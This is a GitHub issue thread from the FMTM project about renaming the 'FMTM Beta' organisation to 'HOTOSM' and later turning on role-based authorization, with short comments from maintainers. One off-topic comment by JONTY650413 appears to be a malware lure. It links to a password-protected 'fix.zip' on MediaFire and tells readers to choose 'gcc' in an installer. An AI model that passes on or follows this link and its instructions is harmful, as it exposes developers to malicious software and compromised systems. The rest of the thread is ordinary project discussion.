### ISSUE TITLE
Rename 'FMTM Beta' organisation --> 'HOTOSM'

### ISSUE THREAD

**Issue by spwoodcock** [hotosm/fmtm#1759]
**Is your feature request related to a problem? Please describe.**

- Have an 'FMTM Beta' organisation currently.
- This org has relaxed permissions, allowing all users to do all actions.

**Describe the solution you'd like**

- First we need to rename the 'FMTM Beta' org --> 'HOTOSM' to clarify FMTM is no longer in beta.
- Next we probably need to enable the authorization for the organisation (removing the bypass in `roles.check_access`.
  - This part will require significant testing though before we push it out.

**Describe alternatives you've considered**

- We could possibly just do the rename in 2024.4.0 release for simplicity, then do the authorization enabling in a later release.

@manjitapandey @ramyaragupathy

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sujanadh** [comment]
is this immediate implementation or can it wait?

**Comment by spwoodcock** [comment]
I'll take a look at this soon, as hopefully it's a quick thing to do 😄

Need to just do some thorough testing of endpoints after though (the automated tests will be useful too)
